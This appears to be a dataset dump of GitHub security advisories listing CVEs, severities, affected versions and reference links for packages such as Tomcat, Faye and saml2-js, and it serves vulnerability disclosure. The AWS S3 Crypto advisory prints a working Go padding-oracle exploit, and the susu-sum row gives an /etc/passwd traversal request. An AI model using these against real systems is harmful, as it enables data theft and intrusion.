ecosystem stringclasses 14 values | vuln_id stringlengths 10 19 | summary stringlengths 4 267 ⌀ | details stringlengths 9 13.5k | aliases stringlengths 17 144 ⌀ | modified_date stringdate 2010-05-27 05:47:00 2022-05-10 08:46:52 | published_date stringdate 2005-12-31 05:00:00 2022-05-10 08:46:50 | severity stringclasses 5 values | score float64 0 10 ⌀ | cwe_id stringclasses 988 values | refs stringlengths 30 17.7k ⌀ | introduced stringlengths 75 4.26k ⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
GHSA | GHSA-9f3j-pm6f-9fm5 | Race condition in Apache Tomcat | The fix for bug CVE-2020-9484 introduced a time of check time of use vulnerability into Apache Tomcat 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only exploitable when Tomcat is configured to persist sessions using the FileStore. | {'CVE-2022-23181'} | 2022-04-22T15:34:54Z | 2022-02-01T00:45:44Z | HIGH | 7 | {'CWE-367'} | {'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread/l8x62p3k19yfcb208jo4zrb83k5mfwg9', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23181', 'https://github.com/advisories/GHSA-9f3j-pm6f-9fm5', 'https://security.netapp.com/advisory/ntap-20220217-0010/'} | null |
GHSA | GHSA-353r-3v84-9pjj | Malicious Package in nothing-js | `nothing-js` contained a malicious script that attempted to delete all files when `npm test` was run.
## Recommendation
This module has been unpublished from the npm Registry. If you find this module in your environment remove it. | null | 2021-10-01T13:25:57Z | 2020-09-01T20:40:36Z | CRITICAL | 9.8 | {'CWE-506'} | {'https://www.npmjs.com/advisories/650', 'https://github.com/advisories/GHSA-353r-3v84-9pjj'} | null |
GHSA | GHSA-g5wh-fw4m-2v28 | CSRF vulnerability in Jenkins autonomiq plugin | A cross-site request forgery (CSRF) vulnerability in Jenkins autonomiq Plugin 1.15 and earlier allows attackers to connect to an attacker-specified URL server using attacker-specified credentials. | {'CVE-2022-25194'} | 2022-05-04T20:57:42Z | 2022-02-16T00:01:23Z | HIGH | 8.8 | {'CWE-352'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-25194', 'https://github.com/jenkinsci/autonomiq-plugin/commit/e06b1ff67664a90819c9561bbc12f4c6e593d1dc', 'https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2545', 'https://github.com/advisories/GHSA-g5wh-fw4m-2v28'} | null |
GHSA | GHSA-wfw3-rgfr-6g67 | XSS via Angular Expression in ag-grid | Affected versions of `ag-grid` are vulnerable to Cross-site Scripting (XSS) via Angular Expressions, if used in combination with AngularJS.
## Recommendation
Avoid using `ag-grid` in combination with AngularJS until a fix is available. | {'CVE-2017-16009'} | 2021-01-14T15:55:50Z | 2020-09-01T16:40:42Z | MODERATE | 0 | {'CWE-79'} | {'https://github.com/advisories/GHSA-wfw3-rgfr-6g67', 'https://nodesecurity.io/advisories/327', 'https://spring.io/blog/2016/01/28/angularjs-escaping-the-expression-sandbox-for-xss', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16009', 'https://www.npmjs.com/advisories/327', 'https://github.com/ceolter/ag-grid/issues/1287'} | null |
GHSA | GHSA-8h77-3xwr-hqhh | Cross-site scripting in Jenkins Kiuwan Plugin | Jenkins Kiuwan Plugin 1.6.0 and earlier does not escape query parameters in an error message for a form validation endpoint, resulting in a reflected cross-site scripting (XSS) vulnerability. | {'CVE-2021-21666'} | 2021-06-16T20:03:18Z | 2021-06-16T17:10:50Z | MODERATE | 6.1 | {'CWE-79'} | {'https://www.jenkins.io/security/advisory/2021-06-10/#SECURITY-2367', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21666', 'https://github.com/advisories/GHSA-8h77-3xwr-hqhh', 'http://www.openwall.com/lists/oss-security/2021/06/10/14'} | null |
GHSA | GHSA-3q49-h8f9-9fr9 | Missing TLS certificate verification | Faye uses [em-http-request][6] and [faye-websocket][10] in the Ruby version of
its client. Those libraries both use the [`EM::Connection#start_tls`][1] method
in [EventMachine][2] to implement the TLS handshake whenever a `wss:` URL is
used for the connection. This method does not implement certificate verification
by default, meaning that it does not check that the server presents a valid and
trusted TLS certificate for the expected hostname. That means that any `https:`
or `wss:` connection made using these libraries is vulnerable to a
man-in-the-middle attack, since it does not confirm the identity of the server
it is connected to.
The first request a Faye client makes is always sent via normal HTTP, but later
messages may be sent via WebSocket. Therefore it is vulnerable to the same
problem that these underlying libraries are, and we needed both libraries to
support TLS verification before Faye could claim to do the same. Your client
would still be insecure if its initial HTTPS request was verified, but later
WebSocket connections were not.
This has been a requested feature in EventMachine for many years now; see for
example [#275][3], [#378][4], and [#814][5]. In June 2020, em-http-request
published an [advisory][7] related to this problem and fixed it by [implementing
TLS verification][8] in their own codebase; although EventMachine does not
implement certificate verification itself, it provides an extension point for
the caller to implement it, called [`ssl_verify_peer`][9]. Based on this
implementation, we have incorporated similar functionality into faye-websocket.
After implementing verification in v1.1.6, em-http-request has elected to leave
the `:verify_peer` option switched off by default. We have decided to _enable_
this option by default in Faye, but are publishing a minor release with added
functionality for configuring it. We are mindful of the fact that this may break
existing programs, but we consider it much more important that all clients have
TLS verification turned on by default. A client that is not carrying out
verification is either:
- talking to the expected server, and will not break under this change
- being attacked, and would benefit from being alerted to this fact
- deliberately talking to a server that would be rejected by verification
The latter case includes situations like talking to a non-public server using a
self-signed certificate. We consider this use case to be "working by accident",
rather than functionality that was actively supported, and it should be properly
and explicitly supported instead.
We are releasing Faye v1.4.0, which enables verification by default and provides
a way to opt out of it:
```rb
client = Faye::Client.new('https://example.com/', tls: { verify_peer: false })
```
Unfortunately we can't offer an equivalent of the `:root_cert_file` option that
has been added to faye-websocket, because em-http-request does not support it.
If you need to talk to servers whose certificates are not recognised by your
default root certificates, then you need to add its certificate (or another one
that can verify it) to your system's root set.
The same functionality is now supported in the Node.js version, with a `tls`
option whose values will be passed to the `https` and `tls` modules as
appropriate when making connections. For example, you can provide your own CA
certificate:
```js
var client = new faye.Client('https://example.com/', {
tls: {
ca: fs.readFileSync('path/to/certificate.pem')
}
});
```
For further background information on this issue, please see [faye#524][12] and
[faye-websocket#129][13]. We would like to thank [Tero Marttila][14] and [Daniel
Morsing][15] for providing invaluable assistance and feedback on this issue.
[1]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls
[2]: https://rubygems.org/gems/eventmachine
[3]: https://github.com/eventmachine/eventmachine/issues/275
[4]: https://github.com/eventmachine/eventmachine/pull/378
[5]: https://github.com/eventmachine/eventmachine/issues/814
[6]: https://rubygems.org/gems/em-http-request
[7]: https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request
[8]: https://github.com/igrigorik/em-http-request/pull/340
[9]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer
[10]: https://rubygems.org/gems/faye-websocket
[11]: https://faye.jcoglan.com/
[12]: https://github.com/faye/faye/issues/524
[13]: https://github.com/faye/faye-websocket-ruby/pull/129
[14]: https://github.com/SpComb
[15]: https://github.com/DanielMorsing | {'CVE-2020-15134'} | 2021-01-07T23:42:42Z | 2020-07-31T17:39:42Z | HIGH | 8 | {'CWE-295'} | {'https://blog.jcoglan.com/2020/07/31/missing-tls-verification-in-faye/', 'https://github.com/faye/faye/issues/524', 'https://github.com/eventmachine/eventmachine/pull/378', 'https://github.com/faye/faye-websocket-ruby/pull/129', 'https://github.com/igrigorik/em-http-request/pull/340', 'https://github.com/eventmachine/eventmachine/issues/814', 'https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request', 'https://github.com/faye/faye/security/advisories/GHSA-3q49-h8f9-9fr9', 'https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer', 'https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15134', 'https://github.com/eventmachine/eventmachine/issues/275', 'https://github.com/advisories/GHSA-3q49-h8f9-9fr9'} | null |
GHSA | GHSA-427q-jp8v-ww95 | Cross-site Scripting in kimai2 | CSRF related to duplicate action. (the duplication occurs first before redirecting to edit form). This vulnerability is capable of tricking admin users to duplicate teams. | {'CVE-2021-3976'} | 2021-11-23T18:16:50Z | 2021-11-23T18:16:50Z | MODERATE | 4.3 | {'CWE-352'} | {'https://github.com/advisories/GHSA-427q-jp8v-ww95', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3976', 'https://github.com/kevinpapst/kimai2/commit/b28e9c120c87222e21a238f1b03a609d6a5d506e', 'https://huntr.dev/bounties/0567048a-118c-42ec-9f94-b55533017406'} | null |
GHSA | GHSA-8mgg-5x65-m4m4 | Command Injection in soletta-dev-app | All versions of `soletta-dev-app` are vulnerable to Command Injection. The package does not validate user input on the `/api/service/status` API endpoint, passing contents of the `service` query parameter to an exec call. This may allow attackers to run arbitrary commands in the system.
## Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available. | null | 2021-09-28T15:18:09Z | 2020-09-11T21:08:19Z | HIGH | 0 | {'CWE-77'} | {'https://github.com/advisories/GHSA-8mgg-5x65-m4m4', 'https://www.npmjs.com/advisories/958'} | null |
GHSA | GHSA-799f-r78p-gq9c | Use of Uninitialized Resource in acc_reader. | An issue was discovered in the acc_reader crate through 2020-12-27 for Rust. read_up_to may read from uninitialized memory locations. | {'CVE-2020-36513'} | 2022-01-07T16:22:25Z | 2022-01-06T22:17:38Z | CRITICAL | 9.8 | {'CWE-908'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-36513', 'https://rustsec.org/advisories/RUSTSEC-2020-0155.html', 'https://github.com/advisories/GHSA-799f-r78p-gq9c', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/acc_reader/RUSTSEC-2020-0155.md'} | null |
GHSA | GHSA-gr23-g276-xc73 | Cross Site Request Forgery in concrete5/concrete5 | A cross-site request forgery vulnerability exists in Concrete CMS <v9 that could allow an attacker to make requests on behalf of other users. | {'CVE-2021-22954'} | 2022-02-17T13:22:51Z | 2022-02-11T00:00:58Z | HIGH | 0 | {'CWE-352'} | {'https://documentation.concretecms.org/developers/introduction/version-history/90-release-notes', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22954', 'https://github.com/advisories/GHSA-gr23-g276-xc73'} | null |
GHSA | GHSA-954c-jjx6-cxv7 | Reflected XSS from the callback handler's error query parameter | ### Overview
Versions before and including `1.4.1` are vulnerable to reflected XSS. An attacker can execute arbitrary code by providing an XSS payload in the `error` query parameter which is then processed by the callback handler as an error message.
### Am I affected?
You are affected by this vulnerability if you are using `@auth0/nextjs-auth0` version `1.4.1` or lower **unless** you are using custom error handling that does not return the error message in an HTML response.
### How to fix that?
Upgrade to version `1.4.2`.
### Will this update impact my users?
The fix adds basic HTML escaping to the error message and it should not impact your users.
### Credit
https://github.com/inian
https://github.com/git-ishanpatel | {'CVE-2021-32702'} | 2022-04-19T19:03:01Z | 2021-06-28T16:46:41Z | HIGH | 8 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-32702', 'https://github.com/advisories/GHSA-954c-jjx6-cxv7', 'https://www.npmjs.com/package/@auth0/nextjs-auth0', 'https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-954c-jjx6-cxv7', 'https://github.com/auth0/nextjs-auth0/commit/6996e2528ceed98627caa28abafbc09e90163ccf'} | null |
GHSA | GHSA-j6w9-fv6q-3q52 | Percent-encoded cookies can be used to overwrite existing prefixed cookie names | A reliance on cookies without validation/integrity check security vulnerability exists in rack < 2.2.3, rack < 2.1.4 that makes it is possible for an attacker to forge a secure or host-only cookie prefix. | {'CVE-2020-8184'} | 2021-01-08T21:28:23Z | 2020-06-24T17:15:00Z | HIGH | 0 | {'CWE-784'} | {'https://github.com/advisories/GHSA-j6w9-fv6q-3q52', 'https://github.com/rack/rack/commit/1f5763de6a9fe515ff84992b343d63c88104654c', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8184', 'https://hackerone.com/reports/895727', 'https://lists.debian.org/debian-lts-announce/2020/07/msg00006.html', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2020-8184.yml', 'https://usn.ubuntu.com/4561-1/', 'https://groups.google.com/g/rubyonrails-security/c/OWtmozPH9Ak'} | null |
GHSA | GHSA-cp67-8w3w-6h9c | Path Traversal | A vulnerability was found in keycloak, where path traversal using URL-encoded path segments in the request is possible because the resources endpoint applies a transformation of the url path to the file path. Only few specific folder hierarchies can be exposed by this flaw | {'CVE-2020-14366'} | 2022-02-09T00:58:03Z | 2022-02-09T00:58:03Z | HIGH | 7.5 | {'CWE-22'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-14366', 'https://github.com/advisories/GHSA-cp67-8w3w-6h9c', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-14366'} | null |
GHSA | GHSA-wq3r-jwrq-xg6w | Canceling of orders not related to the logged-in user | ### Impact
Canceling of orders not related to the logged-in user
### Patches
We recommend updating to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview.
https://www.shopware.com/en/download/#shopware-6
### Workarounds
For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
| null | 2021-06-28T16:57:23Z | 2021-06-28T16:57:23Z | MODERATE | 0 | null | {'https://github.com/advisories/GHSA-wq3r-jwrq-xg6w', 'https://github.com/shopware/platform/security/advisories/GHSA-wq3r-jwrq-xg6w', 'https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659', 'https://www.shopware.com/en/download/#shopware-6'} | null |
GHSA | GHSA-rhg5-fqr3-hrf5 | Injection in DeltaSpike | we got reports for 2 injection attacks against the DeltaSpike windowhandler.js. This is only active if a developer selected the ClientSideWindowStrategy which is not the default. | {'CVE-2019-12416'} | 2022-02-10T20:54:31Z | 2022-02-10T20:54:31Z | MODERATE | 6.1 | {'CWE-74'} | {'https://nvd.nist.gov/vuln/detail/CVE-2019-12416', 'https://lists.apache.org/thread.html/r848d7d4c0bf637da55f01103eb8ba0fce344c295fda53264cbaa1568@%3Ccommits.camel.apache.org%3E', 'https://github.com/advisories/GHSA-rhg5-fqr3-hrf5', 'https://lists.apache.org/thread.html/r8f327712b2b07f867fde1e77cbafcf8cc6a3facaa693ffdd2c3285e3%40%3Cdev.deltaspike.apache.org%3E'} | null |
GHSA | GHSA-2mp8-qvqm-3xwq | Restlet Framework, when using SimpleXMLProvider, allows remote attackers to access arbitrary files via an XXE attack in a REST API HTTP request | Restlet Framework before 2.3.11, when using SimpleXMLProvider, allows remote attackers to access arbitrary files via an XXE attack in a REST API HTTP request. This affects use of the Jax-rs extension. | {'CVE-2017-14868'} | 2022-04-26T21:37:36Z | 2018-10-17T00:04:31Z | HIGH | 7.5 | {'CWE-611'} | {'https://github.com/restlet/restlet-framework-java/wiki/XEE-security-enhancements', 'https://nvd.nist.gov/vuln/detail/CVE-2017-14868', 'https://github.com/restlet/restlet-framework-java/issues/1286', 'https://lgtm.com/blog/restlet_CVE-2017-14868', 'https://github.com/advisories/GHSA-2mp8-qvqm-3xwq'} | null |
GHSA | GHSA-5p5w-j3g7-w4wv | Authentication bypass via incorrect XML canonicalization and DOM traversal in saml2-js | Versions of `saml2-js` prior to 1.12.4 or 2.0.2 are vulnerable to authentication bypass.
The `saml2-js` library may incorrectly utilize the results of XML DOM traversal and canonicalization APIs in such a way that an attacker may be able to manipulate the SAML data without invalidating the cryptographic signature, allowing the attack to potentially bypass authentication to SAML service providers.
Security Assertion Markup Language (SAML) is an XML-based markup language for security assertions regarding authentication and permissions, most commonly used for single sign-on (SSO) services.
Some XML DOM traversal and canonicalization APIs may be inconsistent in handling of comments within XML nodes. Incorrect use of these APIs by some SAML libraries results in incorrect parsing of the inner text of XML nodes such that any inner text after the comment is lost prior to cryptographically signing the SAML message. Text after the comment therefore has no impact on the signature on the SAML message.
A remote attacker can modify SAML content for a SAML service provider without invalidating the cryptographic signature, which may allow attackers to bypass primary authentication for the affected SAML service provider
## Recommendation
If you use 1.x upgrade to version 1.12.4 or greater
If you use 2.x upgrade to version 2.02 or greater | {'CVE-2017-11429'} | 2021-06-11T14:24:19Z | 2019-07-05T21:11:18Z | MODERATE | 7.7 | {'CWE-287'} | {'https://github.com/advisories/GHSA-5p5w-j3g7-w4wv', 'https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations', 'https://nvd.nist.gov/vuln/detail/CVE-2017-11429', 'https://www.npmjs.com/advisories/567', 'https://www.kb.cert.org/vuls/id/475445'} | null |
GHSA | GHSA-vx85-mj8c-4qm6 | Moderate severity vulnerability that affects org.apache.thrift:libthrift | The Apache Thrift Node.js static web server in versions 0.9.2 through 0.11.0 have been determined to contain a security vulnerability in which a remote user has the ability to access files outside the set webservers docroot path. | {'CVE-2018-11798'} | 2021-06-10T20:04:09Z | 2019-01-17T13:56:33Z | MODERATE | 6.5 | {'CWE-538'} | {'https://access.redhat.com/errata/RHSA-2019:3140', 'https://nvd.nist.gov/vuln/detail/CVE-2018-11798', 'https://access.redhat.com/errata/RHSA-2019:1545', 'http://www.securityfocus.com/bid/106501', 'https://github.com/advisories/GHSA-vx85-mj8c-4qm6', 'https://lists.apache.org/thread.html/6e9edd282684896cedf615fb67a02bebfe6007f2d5baf03ba52e34fd@%3Cuser.thrift.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'} | null |
GHSA | GHSA-97gv-3p2c-xw7j | Denial of Service and Content Injection in i18n-node-angular | Versions of `i18n-node-angular` prior to 1.4.0 are affected by denial of service and cross-site scripting vulnerabilities. The vulnerabilities exist in a REST endpoint that was created for development purposes, but was not disabled in production in affected versions.
## Recommendation
Update to version 1.4.0 or later. | {'CVE-2016-10524'} | 2022-02-11T17:08:46Z | 2019-02-18T23:39:06Z | HIGH | 8.2 | {'CWE-74', 'CWE-400'} | {'https://nvd.nist.gov/vuln/detail/CVE-2016-10524', 'https://www.npmjs.com/advisories/80', 'https://nodesecurity.io/advisories/80', 'https://github.com/advisories/GHSA-97gv-3p2c-xw7j', 'https://github.com/oliversalzburg/i18n-node-angular/commit/877720d2d9bb90dc8233706e81ffa03f99fc9dc8'} | null |
GHSA | GHSA-v384-jqmq-fc74 | XSS in Dolibarr ERP & CRM | htdocs/user/passwordforgotten.php in Dolibarr 10.0.6 allows XSS via the Referer HTTP header. | {'CVE-2020-7996'} | 2021-08-19T16:47:32Z | 2020-01-28T22:26:16Z | MODERATE | 6.1 | {'CWE-79'} | {'https://tufangungor.github.io/exploit/2020/01/18/dolibarr-10.0.6-xss-in-http-header.html', 'https://github.com/Dolibarr/dolibarr', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7996', 'https://github.com/tufangungor/tufangungor.github.io/blob/master/_posts/2020-01-19-dolibarr-10.0.6-xss-in-http-header.md', 'https://github.com/advisories/GHSA-v384-jqmq-fc74'} | null |
GHSA | GHSA-77hv-8796-8ccp | Moderate severity vulnerability that affects Plone and Zope2 | ZPublisher.HTTPRequest._scrubHeader in Zope 2 before 2.13.19, as used in Plone before 4.3 beta 1, allows remote attackers to inject arbitrary HTTP headers via a linefeed (LF) character. | {'CVE-2012-5486'} | 2021-06-11T15:32:57Z | 2018-07-23T19:51:50Z | MODERATE | 0 | null | {'http://www.openwall.com/lists/oss-security/2012/11/10/1', 'https://nvd.nist.gov/vuln/detail/CVE-2012-5486', 'https://bugs.launchpad.net/zope2/+bug/930812', 'https://github.com/advisories/GHSA-77hv-8796-8ccp', 'http://rhn.redhat.com/errata/RHSA-2014-1194.html', 'https://plone.org/products/plone/security/advisories/20121106/02', 'https://plone.org/products/plone-hotfix/releases/20121106'} | null |
GHSA | GHSA-jwph-qp5h-f9wj | Data races in bunch | An issue was discovered in the bunch crate through 2020-11-12 for Rust.
Affected versions of this crate unconditionally implements `Send`/`Sync` for `Bunch<T>`.
This allows users to insert `T: !Sync` to `Bunch<T>`. It is possible to create a data race to a `T: !Sync` by invoking the `Bunch::get()` API (which returns `&T`) from multiple threads. It is also possible to send `T: !Send` to other threads by inserting `T` inside `Bunch<T>` and sending `Bunch<T>` to another thread, allowing to create a data race by inserting types like `T = Rc<_>`.
Such data races can lead to memory corruption. | {'CVE-2020-36450'} | 2021-08-25T20:59:18Z | 2021-08-25T20:59:18Z | HIGH | 8.1 | {'CWE-362', 'CWE-77'} | {'https://github.com/krl/bunch/issues/1', 'https://rustsec.org/advisories/RUSTSEC-2020-0130.html', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/bunch/RUSTSEC-2020-0130.md', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36450', 'https://github.com/advisories/GHSA-jwph-qp5h-f9wj'} | null |
GHSA | GHSA-8p5c-f328-9fvv | Diffoscope may write to arbitrary locations due to an untrusted archive | diffoscope before 76 writes to arbitrary locations on disk based on the contents of an untrusted archive. | {'CVE-2017-0359'} | 2022-04-26T18:16:33Z | 2018-07-13T16:01:21Z | CRITICAL | 9.8 | {'CWE-22'} | {'https://security-tracker.debian.org/tracker/CVE-2017-0359', 'https://github.com/advisories/GHSA-8p5c-f328-9fvv', 'https://github.com/anthraxx/diffoscope/commit/632a40828a54b399787c25e7fa243f732aef7e05', 'https://nvd.nist.gov/vuln/detail/CVE-2017-0359', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=854723'} | null |
GHSA | GHSA-f5pg-7wfw-84q9 | CBC padding oracle issue in AWS S3 Crypto SDK for golang | ### Summary
The golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the CBC option was chosen as content cipher.
### Risk/Severity
The vulnerability pose insider risks/privilege escalation risks, circumventing KMS controls for stored data.
### Impact
This advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non "strict" versions of C++ and Java S3 Crypto SDKs being present as well.
V1 prior to 1.34.0 of the S3 crypto SDK, allows users to encrypt files with AES-CBC, without computing a MAC on the data. Note that there is an alternative option of using AES-GCM, which is used in the examples of the documentation and not affected by this vulnerability, but by CVE-2020-8912.
This exposes a padding oracle vulnerability: If the attacker has write access to the S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file (without observing the file contents that the endpoint learns in the process), they can reconstruct the plaintext with (on average) `128*length(plaintext)` queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors.
This issue is fixed in V2 of the API, by disabling encryption with CBC mode for new files. Old files, if they have been encrypted with CBC mode, remain vulnerable until they are reencrypted with AES-GCM.
### Mitigation
Using the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with CBC mode.
### Proof of concept
A [Proof of concept](https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc) is available in a separate github repository.
This particular issue is described in [padding_oracle_exploit.go](https://github.com/sophieschmieg/exploits/blob/master/aws_s3_crypto_poc/exploit/padding_oracle_exploit.go):
```golang
func PaddingOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) {
data, header, err := input.S3Mock.GetObjectDirect(bucket, key)
if alg := header.Get("X-Amz-Meta-X-Amz-Cek-Alg"); alg != "AES/CBC/PKCS5Padding" {
return "", fmt.Errorf("Algorithm is %q, not CBC!", alg)
}
length, err := strconv.Atoi(header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Length"))
padding := byte(len(data) - length)
plaintext := make([]byte, length)
for i := length - 1; i >= 0; i-- {
newLength := 16 * (i/16 + 1)
dataCopy := make([]byte, newLength)
headerCopy := header.Clone()
copy(dataCopy, data)
// Set Padding
newPadding := byte(newLength - i)
for j := i + 1; j < newLength; j++ {
var oldValue byte
if j >= length {
oldValue = padding
} else {
oldValue = plaintext[j]
}
dataCopy, headerCopy, err = xorData(oldValue^newPadding, j, dataCopy, headerCopy)
if err != nil {
return "", err
}
}
// Guess
for c := 0; c < 256; c++ {
dataCopy, headerCopy, err := xorData(byte(c)^newPadding, i, dataCopy, headerCopy)
input.S3Mock.PutObjectDirect(bucket, key+"guess", dataCopy, headerCopy)
if input.Oracle(bucket, key+"guess") {
plaintext[i] = byte(c)
break
}
dataCopy, headerCopy, err = xorData(byte(c)^newPadding, i, dataCopy, headerCopy)
}
}
return string(plaintext), nil
}
``` | {'CVE-2020-8911'} | 2022-04-19T19:02:32Z | 2022-02-11T23:26:26Z | MODERATE | 5.6 | {'CWE-327'} | {'https://bugzilla.redhat.com/show_bug.cgi?id=1869800', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8911', 'https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9', 'https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc', 'https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09', 'https://github.com/aws/aws-sdk-go/pull/3403', 'https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e', 'https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4', 'https://github.com/advisories/GHSA-f5pg-7wfw-84q9'} | null |
GHSA | GHSA-f3j5-rmmp-3fc5 | Improper Input Validation in jackson-databind | A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup. | {'CVE-2019-17267'} | 2021-08-30T14:18:34Z | 2020-06-15T18:44:48Z | CRITICAL | 9.8 | {'CWE-502'} | {'https://github.com/FasterXML/jackson-databind/issues/2460', 'https://access.redhat.com/errata/RHSA-2019:3200', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0445', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20191017-0006/', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://access.redhat.com/errata/RHSA-2020:0161', 'https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10', 'https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0160', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0159', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 'https://github.com/advisories/GHSA-f3j5-rmmp-3fc5', 'https://lists.debian.org/debian-lts-announce/2019/12/msg00013.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-17267', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r9d727fc681fb3828794acbefcaee31393742b4d73a29461ccd9597a8@%3Cdev.skywalking.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0164'} | null |
GHSA | GHSA-6x46-7rrv-m4h8 | Low severity vulnerability that affects sqlite3-ruby | The sqlite3-ruby gem in the rubygem-sqlite3 package before 1.2.4-0.5.1 in SUSE Linux Enterprise (SLE) 11 SP1 uses weak permissions for unspecified files, which allows local users to gain privileges via unknown vectors. | {'CVE-2011-0995'} | 2021-09-02T19:09:05Z | 2017-10-24T18:33:38Z | LOW | 0 | null | {'https://github.com/advisories/GHSA-6x46-7rrv-m4h8', 'https://nvd.nist.gov/vuln/detail/CVE-2011-0995', 'http://www.osvdb.org/72180', 'http://www.securityfocus.com/bid/47694', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/67263', 'http://support.novell.com/security/cve/CVE-2011-0995.html', 'https://bugzilla.novell.com/show_bug.cgi?id=685928', 'http://secunia.com/advisories/44418'} | null |
GHSA | GHSA-w7jg-972m-rphv | Directory Traversal in susu-sum | Affected versions of `susu-sum` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead. | {'CVE-2017-16199'} | 2021-01-14T15:40:13Z | 2020-09-01T18:17:28Z | HIGH | 0 | {'CWE-22'} | {'https://nvd.nist.gov/vuln/detail/CVE-2017-16199', 'https://nodesecurity.io/advisories/429', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/susu-sum', 'https://www.npmjs.com/advisories/429', 'https://github.com/advisories/GHSA-w7jg-972m-rphv'} | null |
GHSA | GHSA-h2jv-5v3f-7m7j | Downloads Resources over HTTP in adamvr-geoip-lite | Affected versions of `adamvr-geoip-lite` insecurely download resources over HTTP.
In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. This could impact the integrity and availability of the data being used to make geolocation decisions by an application.
## Recommendation
